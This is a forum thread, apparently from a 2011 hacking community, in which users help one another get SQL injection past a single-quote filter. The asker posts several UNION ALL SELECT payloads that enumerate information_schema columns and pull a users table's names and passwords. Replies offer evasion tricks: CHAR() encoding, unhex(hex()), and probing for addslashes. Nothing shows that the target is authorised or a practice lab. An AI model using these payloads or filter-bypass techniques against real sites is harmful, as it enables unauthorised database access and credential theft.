| Author |
SQLi with character filters - how to? |
espartaniac
Member
Posts: 7
Location:
Joined: 12.07.11
Rank: Active User
Warn Level: 5
|
|
hey guys. how do I proceed with SQLi when seems to be some sort of character filter.
whenever I use ', for example, I get an error. That becomes an issue when I try something like:
UNION ALL SELECT 1,2,column_name,4 FROM information_schema.columns WHERE table_name='table'--
I've tried using things like table_name=CHR(39)||table||CHR(39) with no success.
Any ideas?  |
|
| Author |
RE: SQLi with character filters - how to? |
spyware
Member
Posts: 4190
Location: The Netherlands
Joined: 14.04.07
Rank: God
Warn Level: 90
|
|
it's char(12,34,45,56).
not sure if chr() is a valid command. If you run into filters, try to replicate them and test locally.
"The chowner of property." - Zeph Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term. - Carl Sagan Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor? - Ebert |
|
| Author |
RE: SQLi with character filters - how to? |
eax
Member
Posts: 4
Location:
Joined: 09.07.11
Rank: Apprentice |
|
|
http://wocares.com/noquote.php |
|
|
| Author |
RE: SQLi with character filters - how to? |
spyware
Member
Posts: 4190
Location: The Netherlands
Joined: 14.04.07
Rank: God
Warn Level: 90
|
|
http://hackvertor.co.uk
"The chowner of property." - Zeph Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term. - Carl Sagan Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor? - Ebert |
|
|
| Author |
RE: SQLi with character filters - how to? |
espartaniac
Member
Posts: 7
Location:
Joined: 12.07.11
Rank: Active User
Warn Level: 5
|
|
thanks for the tips guys, but still no results.
I tried these inputs:
union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(0x27,users,0x27)--
union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)usersCHAR(39)--
union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)||users||CHAR(39)--
union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(CHAR(39),users,CHAR(39))--
I've also tried substituting ='users' and 'users' for CHAR(xxx). no cigar.
It is strange that the first one doesn't work, because if I try something like:
union all select null,null,CONCAT(users,0x27,pass),null,null,null,null,null from users--
it works.... so it shouldn't be a problem with CONCAT.
Any more ideas?
Edited by espartaniac on 16-07-11 01:01 |
|
|
| Author |
RE: SQLi with character filters - how to? |
Tucak
Member
Posts: 19
Location:
Joined: 04.06.08
Rank: God |
|
|
It should be something like WHERE table_name=char(1,2,3,4) |
|
|
| Author |
RE: unhex(hex()) |
s0lar
Member
Posts: 4
Location:
Joined: 22.07.11
Rank: Newbie |
|
Have you tried the unhex(hex()) method - that always seems to work for me.
and its also worth adding a \ character before your single quotes to see if their still using addslashes or something equally pathetic.
 |
|
|
| Author |
RE: SQLi with character filters - how to? |
gr00ve_hacker
Member
Posts: 3
Location: Your 127.0.0.1
Joined: 13.01.11
Rank: HBH Guru |
|
You might want to have a look here :
http://www.youtube.com/watch?v=EWQoAoJix2I
http://gr00ve-hack3r.com
Hacking articles, videos, Downloads and much more |
|
|
Main:
